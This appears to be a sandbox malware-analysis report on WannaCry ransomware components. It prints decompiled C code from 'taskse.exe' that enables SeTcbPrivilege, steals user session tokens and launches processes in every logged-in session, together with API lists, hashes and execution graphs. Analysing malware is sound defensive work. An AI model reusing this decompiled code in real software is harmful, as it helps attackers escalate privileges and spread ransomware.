						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}





                                  0x00407650
                                  0x0040765c
                                  0x00407675
                                  0x00407677
                                  0x0040767f
                                  0x00407688
                                  0x0040768d
                                  0x0040767f
                                  0x00407692
                                  0x00407698
                                  0x0040765e
                                  0x00407660
                                  0x00407667
                                  0x0040766d
                                  0x0040766d

                                  APIs
                                  • #2379.MFC42 ref: 00407692
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • #2379.MFC42(00000001), ref: 00407667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$time
                                  • String ID: Wana Decrypt0r 2.0
                                  • API String ID: 2017816395-4201229886
                                  • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                  • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:83.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:56.6%
                                  Total number of Nodes:53
                                  Total number of Limit Nodes:2
                                  execution_graph 115 40154c __set_app_type __p__fmode __p__commode 116 4015bb 115->116 117 4015c3 __setusermatherr 116->117 118 4015cf 116->118 117->118 127 4016b6 _controlfp 118->127 120 4015d4 _initterm __getmainargs _initterm 121 401628 GetStartupInfoA 120->121 123 40165c GetModuleHandleA 121->123 128 401510 __p___argc 123->128 126 401680 exit _XcptFilter 127->120 129 401520 __p___argv 128->129 130 40151b 128->130 133 401420 LoadLibraryA 129->133 130->126 132 401531 132->126 134 401449 GetProcAddress 133->134 135 40143e 133->135 136 401468 GetProcAddress 134->136 137 40145d 134->137 135->132 138 40147a 136->138 141 401485 136->141 137->132 138->132 139 4014a3 139->132 141->139 142 4014e1 Sleep 141->142 143 401000 GetModuleHandleA 141->143 142->139 142->141 144 401064 LoadLibraryA 143->144 145 401079 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 143->145 144->145 146 401405 144->146 145->146 147 4010c2 145->147 146->141 147->146 148 4010e8 GetModuleHandleA 147->148 149 4010f9 LoadLibraryA 148->149 150 40110e GetProcAddress GetProcAddress GetProcAddress 148->150 149->146 149->150 150->146 151 401138 150->151 151->146 152 401149 GetModuleHandleA 151->152 153 40115a LoadLibraryA 152->153 154 40116f GetProcAddress GetProcAddress 152->154 153->146 153->154 154->146 155 40118e 154->155 155->146 156 401196 GetModuleHandleA 155->156 157 4011a5 LoadLibraryA 156->157 158 4011b8 GetProcAddress 156->158 157->146 157->158 158->146 159 4011ca 158->159 160 4011e2 LookupPrivilegeValueA 159->160 161 4011f9 _local_unwind2 159->161 160->161 163 401204 AdjustTokenPrivileges 160->163 161->146 163->161 164 401275 163->164 165 40128b _local_unwind2 164->165 166 4012ab 164->166 165->141 166->161 167 401366 166->167 168 401377 167->168 169 40136b WaitForSingleObject 167->169 172 401398 168->172 169->168 173 40139f 172->173 174 4013e0 AdjustTokenPrivileges 173->174 175 401383 173->175 174->175 175->141 176 40169e _exit

                                  Callgraph

                                  Executed Functions

                                  Function 00401000 Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 294libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 48%
                                  			E00401000(intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
				int _v8;
				char _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				signed int _v56;
				int _v60;
				_Unknown_base(*)()* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct _TOKEN_PRIVILEGES _v84;
				signed int _v88;
				_Unknown_base(*)()* _v92;
				_Unknown_base(*)()* _v96;
				_Unknown_base(*)()* _v100;
				_Unknown_base(*)()* _v108;
				signed int _v112;
				char _v116;
				char _v120;
				_Unknown_base(*)()* _v124;
				_Unknown_base(*)()* _v136;
				char _v140;
				struct _LUID _v148;
				long _v152;
				intOrPtr _v156;
				short _v176;
				CHAR* _v216;
				void _v220;
				char _v224;
				long _v228;
				long _v232;
				struct _TOKEN_PRIVILEGES _v240;
				void* __ebx;
				void* __ebp;
				signed int _t94;
				struct HINSTANCE__* _t101;
				intOrPtr _t107;
				struct HINSTANCE__* _t158;
				struct HINSTANCE__* _t160;
				struct HINSTANCE__* _t161;
				signed int _t162;
				intOrPtr _t165;
				void* _t166;

				_push(0xffffffff);
				_push(0x402060);
				_push(0x401540);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t165;
				_t166 = _t165 - 0xdc;
				_v60 = 0;
				_v84.PrivilegeCount = 0;
				_v84.Privileges = 0;
				_v76 = 0;
				_v72 = 0;
				_v140 = 0;
				_v120 = 0;
				_v116 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t158 = GetModuleHandleA("advapi32.dll");
				if(_t158 != 0) {
					L2:
					_v68 = GetProcAddress(_t158, "OpenProcessToken");
					_v136 = GetProcAddress(_t158, "LookupPrivilegeValueA");
					_v108 = GetProcAddress(_t158, "AdjustTokenPrivileges");
					_v100 = GetProcAddress(_t158, "DuplicateTokenEx");
					_t94 = GetProcAddress(_t158, "CreateProcessAsUserA");
					_v88 = _t94;
					if(_v68 == 0 || _v136 == 0 || _v108 == 0 || _v100 == 0 || _t94 == 0) {
						goto L39;
					} else {
						_t160 = GetModuleHandleA("kernel32.dll");
						if(_t160 != 0) {
							L9:
							_v96 = GetProcAddress(_t160, "WTSGetActiveConsoleSessionId");
							_v92 = GetProcAddress(_t160, "GetCurrentProcess");
							_t94 = GetProcAddress(_t160, "CloseHandle");
							_v56 = _t94;
							if(_v96 == 0 || _v92 == 0 || _t94 == 0) {
								goto L39;
							} else {
								_t161 = GetModuleHandleA("userenv.dll");
								if(_t161 != 0) {
									L14:
									_v124 = GetProcAddress(_t161, "CreateEnvironmentBlock");
									_t94 = GetProcAddress(_t161, "DestroyEnvironmentBlock");
									_v112 = _t94;
									if(_v124 == 0 || _t94 == 0) {
										goto L39;
									} else {
										_t101 = GetModuleHandleA("wtsapi32.dll");
										if(_t101 != 0) {
											L18:
											_t94 = GetProcAddress(_t101, "WTSQueryUserToken");
											_t162 = _t94;
											if(_t162 == 0) {
												goto L39;
											} else {
												_v8 = 0;
												_push(_v92(0x28,  &_v60));
												if(_v68() == 0) {
													L37:
													_push(0xffffffff);
													_t94 =  &_v20;
													_push(_t94);
													goto L38;
												} else {
													_t94 = LookupPrivilegeValueA(0, "SeTcbPrivilege",  &_v148);
													if(_t94 != 0) {
														_v240.PrivilegeCount = 0;
														_v240.Privileges = 0;
														_v232 = 0;
														_v228 = 0;
														_v240.PrivilegeCount = 1;
														_v240.Privileges = _v148.LowPart;
														_v232 = _v148.HighPart;
														_v228 = 2;
														_t94 = AdjustTokenPrivileges(_v60, 0,  &_v240, 0x10,  &_v84,  &_v152);
														if(_t94 != 0) {
															_t107 = _a8;
															if(_t107 != 0xffffffff) {
																_v156 = _t107;
																goto L28;
															} else {
																_t107 = _v96();
																_v156 = _t107;
																if(_t107 != 0xffffffff) {
																	L28:
																	_t94 =  *_t162(_t107,  &_v140); // executed
																	if(_t94 != 0) {
																		_t94 = _v100(_v140, 0x2000000, 0, 1, 1,  &_v120);
																		if(_t94 != 0) {
																			_v224 = 0;
																			memset( &_v220, 0, 0x10 << 2);
																			_t166 = _t166 + 0xc;
																			_v224 = 0x44;
																			_v216 = "winsta0\\default";
																			_v176 = _a12;
																			_push(1);
																			_push(_v120);
																			_push( &_v116);
																			if(_v124() == 0) {
																				goto L37;
																			} else {
																				_push( &_v48);
																				_push( &_v224);
																				_push(0);
																				_push(_v116);
																				_push(0x400);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(_a4);
																				_push(_v120);
																				if(_v88() == 0) {
																					goto L37;
																				} else {
																					if(_a16 != 0) {
																						WaitForSingleObject(_v48, 0xffffffff);
																					}
																					_v8 = 0xffffffff;
																					E00401398(0);
																					 *[fs:0x0] = _v20;
																					return 0;
																				}
																			}
																		} else {
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L38;
																		}
																	} else {
																		_push(0xffffffff);
																		_push( &_v20);
																		goto L38;
																	}
																} else {
																	_push(_t107);
																	_push( &_v20);
																	L00401546();
																	 *[fs:0x0] = _v20;
																	return 0;
																}
															}
														} else {
															_push(0xffffffff);
															_push( &_v20);
															goto L38;
														}
													} else {
														_push(0xffffffff);
														_push( &_v20);
														L38:
														L00401546();
														goto L39;
													}
												}
											}
										} else {
											_t94 = LoadLibraryA("wtsapi32.dll");
											if(_t94 == 0) {
												goto L39;
											} else {
												goto L18;
											}
										}
									}
								} else {
									_t94 = LoadLibraryA("userenv.dll"); // executed
									_t161 = _t94;
									if(_t161 == 0) {
										goto L39;
									} else {
										goto L14;
									}
								}
							}
						} else {
							_t94 = LoadLibraryA("kernel32.dll");
							_t160 = _t94;
							if(_t160 == 0) {
								goto L39;
							} else {
								goto L9;
							}
						}
					}
				} else {
					_t94 = LoadLibraryA("advapi32.dll"); // executed
					_t158 = _t94;
					if(_t158 == 0) {
						L39:
						 *[fs:0x0] = _v20;
						return _t94 | 0xffffffff;
					} else {
						goto L2;
					}
				}
			}















































                                  0x00401003
                                  0x00401005
                                  0x0040100a
                                  0x00401015
                                  0x00401016
                                  0x0040101d
                                  0x00401028
                                  0x0040102b
                                  0x00401030
                                  0x00401033
                                  0x00401036
                                  0x00401039
                                  0x0040103f
                                  0x00401042
                                  0x00401045
                                  0x0040104a
                                  0x0040104d
                                  0x00401050
                                  0x0040105e
                                  0x00401062
                                  0x00401079
                                  0x00401087
                                  0x00401092
                                  0x004010a0
                                  0x004010ab
                                  0x004010b4
                                  0x004010b6
                                  0x004010bc
                                  0x00000000
                                  0x004010e8
                                  0x004010f3
                                  0x004010f7
                                  0x0040110e
                                  0x00401116
                                  0x00401121
                                  0x0040112a
                                  0x0040112c
                                  0x00401132
                                  0x00000000
                                  0x00401149
                                  0x00401154
                                  0x00401158
                                  0x0040116f
                                  0x00401177
                                  0x00401180
                                  0x00401182
                                  0x00401188
                                  0x00000000
                                  0x00401196
                                  0x0040119b
                                  0x004011a3
                                  0x004011b8
                                  0x004011be
                                  0x004011c0
                                  0x004011c4
                                  0x00000000
                                  0x004011ca
                                  0x004011ca
                                  0x004011d6
                                  0x004011dc
                                  0x004013f7
                                  0x004013f7
                                  0x004013f9
                                  0x004013fc
                                  0x00000000
                                  0x004011e2
                                  0x004011ef
                                  0x004011f7
                                  0x00401204
                                  0x0040120c
                                  0x00401212
                                  0x00401218
                                  0x0040121e
                                  0x0040122e
                                  0x0040123a
                                  0x00401240
                                  0x00401263
                                  0x00401268
                                  0x00401275
                                  0x0040127b
                                  0x004012ab
                                  0x00000000
                                  0x0040127d
                                  0x0040127d
                                  0x00401280
                                  0x00401289
                                  0x004012b1
                                  0x004012b9
                                  0x004012bd
                                  0x004012df
                                  0x004012e4
                                  0x004012f1
                                  0x00401304
                                  0x00401304
                                  0x00401306
                                  0x00401310
                                  0x0040131e
                                  0x00401325
                                  0x0040132a
                                  0x0040132e
                                  0x00401334
                                  0x00000000
                                  0x0040133a
                                  0x0040133d
                                  0x00401344
                                  0x00401345
                                  0x00401349
                                  0x0040134a
                                  0x0040134f
                                  0x00401350
                                  0x00401351
                                  0x00401352
                                  0x00401356
                                  0x0040135a
                                  0x00401360
                                  0x00000000
                                  0x00401366
                                  0x00401369
                                  0x00401371
                                  0x00401371
                                  0x00401377
                                  0x0040137e
                                  0x00401388
                                  0x00401395
                                  0x00401395
                                  0x00401360
                                  0x004012e6
                                  0x004012e6
                                  0x004012eb
                                  0x00000000
                                  0x004012eb
                                  0x004012bf
                                  0x004012bf
                                  0x004012c4
                                  0x00000000
                                  0x004012c4
                                  0x0040128b
                                  0x0040128b
                                  0x0040128f
                                  0x00401290
                                  0x0040129d
                                  0x004012aa
                                  0x004012aa
                                  0x00401289
                                  0x0040126a
                                  0x0040126a
                                  0x0040126f
                                  0x00000000
                                  0x0040126f
                                  0x004011f9
                                  0x004011f9
                                  0x004011fe
                                  0x004013fd
                                  0x004013fd
                                  0x00000000
                                  0x00401402
                                  0x004011f7
                                  0x004011dc
                                  0x004011a5
                                  0x004011aa
                                  0x004011b2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004011b2
                                  0x004011a3
                                  0x0040115a
                                  0x0040115f
                                  0x00401165
                                  0x00401169
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401169
                                  0x00401158
                                  0x004010f9
                                  0x004010fe
                                  0x00401104
                                  0x00401108
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401108
                                  0x004010f7
                                  0x00401064
                                  0x00401069
                                  0x0040106f
                                  0x00401073
                                  0x00401405
                                  0x0040140b
                                  0x00401418
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401073

                                  APIs
                                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,?), ref: 00401058
                                  • LoadLibraryA.KERNELBASE(advapi32.dll), ref: 00401069
                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00401085
                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 00401090
                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040109E
                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004010A9
                                  • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserA), ref: 004010B4
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004010ED
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004010FE
                                  • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 00401114
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0040111F
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 0040112A
                                  • GetModuleHandleA.KERNEL32(userenv.dll), ref: 0040114E
                                  • LoadLibraryA.KERNELBASE(userenv.dll), ref: 0040115F
                                  • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00401175
                                  • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00401180
                                  • GetModuleHandleA.KERNEL32(wtsapi32.dll), ref: 0040119B
                                  • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 004011AA
                                  • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 004011BE
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 004011EF
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00401263
                                  • _local_unwind2.MSVCRT ref: 004013FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleLibraryLoadModule$AdjustLookupPrivilegePrivilegesTokenValue_local_unwind2
                                  • String ID: AdjustTokenPrivileges$CloseHandle$CreateEnvironmentBlock$CreateProcessAsUserA$DestroyEnvironmentBlock$DuplicateTokenEx$GetCurrentProcess$LookupPrivilegeValueA$OpenProcessToken$SeTcbPrivilege$WTSGetActiveConsoleSessionId$WTSQueryUserToken$advapi32.dll$kernel32.dll$userenv.dll$wtsapi32.dll
                                  • API String ID: 991275522-4095908470
                                  • Opcode ID: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                  • Instruction ID: a8daa8c7751dfcdc06dbaee4ace7374b5f05fd79cd89a88388c8f82615ea9d1e
                                  • Opcode Fuzzy Hash: 3f61e722ca8088b632f897d1d5b6cf3ee36d8dd7d80411764f40106c482f8f63
                                  • Instruction Fuzzy Hash: 07A13E71D002599BDB20DFA58C84BAEBBB8FB48711F10467FE519B72D0E77449418F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401398 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 89 401398-40139d 90 4013a7 89->90 91 40139f-4013a5 89->91 92 4013aa-4013af 90->92 91->92 94 4013b1 92->94 95 4013b4-4013b9 92->95 94->95 96 4013c2-4013c7 95->96 97 4013bb-4013bf 95->97 98 4013c9 96->98 99 4013cc-4013d4 96->99 97->96 98->99 100 4013d6 99->100 101 4013d9-4013de 99->101 100->101 103 4013e0-4013f3 AdjustTokenPrivileges 101->103 104 4013f6 101->104 103->104
                                  APIs
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,00401383), ref: 004013EA
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                  • Instruction ID: c5c4706423aeddcfda8965a2f2378707b10bac3de658310f62e01f4fd8324524
                                  • Opcode Fuzzy Hash: ea4fe9ee62a20299c49249978a6f65f8c05524396715b8152d2cfc0051420814
                                  • Instruction Fuzzy Hash: 970146B5E10259ABDF10DAE8DCC49AEBBBDAB08304F54482AF905F7650C7789C848B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040154C Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 80%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x402070);
				_push(0x401540);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x4031b4 =  *0x4031b4 | 0xffffffff;
				 *0x4031b8 =  *0x4031b8 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x4031b0; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x4031ac; // 0x0
				 *_t24 = _t47;
				 *0x4031bc = _adjust_fdiv;
				_t27 = E004016CB( *_adjust_fdiv);
				_t61 =  *0x4031a0; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004016C8);
				}
				E004016B6(_t27);
				_push(0x40300c);
				_push(0x403008);
				L004016B0();
				_t29 =  *0x4031a8; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x4031a4,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L004016B0();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00401510(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004016AA();
				return _t41;
			}





























                                  0x0040154f
                                  0x00401551
                                  0x00401556
                                  0x00401561
                                  0x00401562
                                  0x0040156f
                                  0x00401574
                                  0x00401579
                                  0x00401580
                                  0x00401587
                                  0x0040158e
                                  0x00401594
                                  0x0040159a
                                  0x0040159c
                                  0x004015a2
                                  0x004015a8
                                  0x004015b1
                                  0x004015b6
                                  0x004015bb
                                  0x004015c1
                                  0x004015c8
                                  0x004015ce
                                  0x004015cf
                                  0x004015d4
                                  0x004015d9
                                  0x004015de
                                  0x004015e3
                                  0x004015e8
                                  0x00401601
                                  0x00401607
                                  0x0040160c
                                  0x00401611
                                  0x0040161e
                                  0x00401620
                                  0x00401626
                                  0x00401662
                                  0x00401667
                                  0x00401668
                                  0x00401668
                                  0x00401628
                                  0x00401628
                                  0x00401628
                                  0x00401629
                                  0x0040162c
                                  0x0040162e
                                  0x00401639
                                  0x0040163b
                                  0x0040163b
                                  0x0040163c
                                  0x0040163c
                                  0x00401639
                                  0x0040163f
                                  0x00401643
                                  0x00000000
                                  0x00000000
                                  0x00401649
                                  0x00401650
                                  0x0040165a
                                  0x0040166f
                                  0x0040165c
                                  0x0040165c
                                  0x0040165c
                                  0x0040167b
                                  0x00401680
                                  0x00401684
                                  0x0040168a
                                  0x0040168f
                                  0x00401691
                                  0x00401694
                                  0x00401695
                                  0x00401696
                                  0x0040169d

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                  • Instruction ID: 2b2245ead73f1024077fef078df1cc7ef2642006793b2c968f0509b8df6eedd3
                                  • Opcode Fuzzy Hash: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                  • Instruction Fuzzy Hash: E4417DB1800344AFD7209FA4DE49AAA7FBCAB09711F24063FF541B72E1C7794941CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401420 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 70 401420-40143c LoadLibraryA 71 401449-40145b GetProcAddress 70->71 72 40143e-401448 70->72 73 401468-401478 GetProcAddress 71->73 74 40145d-401467 71->74 75 401485-4014a1 73->75 76 40147a-401484 73->76 78 4014a3-4014ad 75->78 79 4014ae-4014b6 75->79 80 4014f5-401507 79->80 81 4014b8-4014c2 79->81 82 4014c4-4014db call 401000 81->82 86 4014e1-4014ef Sleep 82->86 87 4014dd 82->87 86->82 88 4014f1 86->88 87->86 88->80
                                  C-Code - Quality: 64%
                                  			E00401420() {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t18;
				signed int _t19;
				signed int _t20;
				signed int _t22;
				void* _t27;
				intOrPtr _t34;
				signed int _t38;
				void* _t39;
				struct HINSTANCE__* _t40;
				signed int _t41;
				void* _t42;
				void* _t45;

				_t45 =  &_v16;
				_v8 = 0;
				_t18 = LoadLibraryA("Wtsapi32.dll"); // executed
				_t40 = _t18;
				if(_t40 != 0) {
					_t19 = GetProcAddress(_t40, "WTSEnumerateSessionsA");
					_t38 = _t19;
					if(_t38 != 0) {
						_t20 = GetProcAddress(_t40, "WTSFreeMemory");
						_t41 = _t20;
						_v4 = _t41;
						if(_t41 != 0) {
							_v16 = 0;
							_v12 = 0;
							_t22 =  *_t38(0, 0, 1,  &_v16,  &_v12); // executed
							if(_v36 != 0) {
								_t39 = 0;
								if(_v32 > 0) {
									_t34 = _v16;
									_t42 = 0;
									do {
										_t27 = E00401000(_t34,  *((intOrPtr*)(_t42 + _v36)), 5, 0); // executed
										_t45 = _t45 + 0x10;
										if(_t27 == 0) {
											_v28 = _v28 + 1;
										}
										Sleep(0x64); // executed
										_t39 = _t39 + 1;
										_t42 = _t42 + 0xc;
									} while (_t39 < _v32);
									_t41 = _v24;
								}
								 *_t41(_v36);
								return _v32;
							} else {
								return _t22 | 0xffffffff;
							}
						} else {
							return _t20 | 0xffffffff;
						}
					} else {
						return _t19 | 0xffffffff;
					}
				} else {
					return _t18 | 0xffffffff;
				}
			}























                                  0x00401420
                                  0x0040142e
                                  0x00401432
                                  0x00401438
                                  0x0040143c
                                  0x00401455
                                  0x00401457
                                  0x0040145b
                                  0x0040146e
                                  0x00401470
                                  0x00401474
                                  0x00401478
                                  0x00401493
                                  0x00401497
                                  0x0040149b
                                  0x004014a1
                                  0x004014b2
                                  0x004014b6
                                  0x004014b8
                                  0x004014c2
                                  0x004014c4
                                  0x004014d1
                                  0x004014d6
                                  0x004014db
                                  0x004014dd
                                  0x004014dd
                                  0x004014e3
                                  0x004014e9
                                  0x004014ea
                                  0x004014ed
                                  0x004014f1
                                  0x004014f1
                                  0x004014fa
                                  0x00401507
                                  0x004014a6
                                  0x004014ad
                                  0x004014ad
                                  0x0040147d
                                  0x00401484
                                  0x00401484
                                  0x00401460
                                  0x00401467
                                  0x00401467
                                  0x00401441
                                  0x00401448
                                  0x00401448

                                  APIs
                                  • LoadLibraryA.KERNELBASE(Wtsapi32.dll,?,?,?,00000000,00401531,?,?,0000000A), ref: 00401432
                                  • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsA), ref: 00401455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.3114145661.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000025.00000002.3114096398.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114185284.0000000000402000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114237529.0000000000403000.00000004.00000001.01000000.00000012.sdmpDownload File
                                  • Associated: 00000025.00000002.3114289937.0000000000404000.00000002.00000001.01000000.00000012.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_taskse.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: WTSEnumerateSessionsA$WTSFreeMemory$Wtsapi32.dll
                                  • API String ID: 2574300362-1631035820
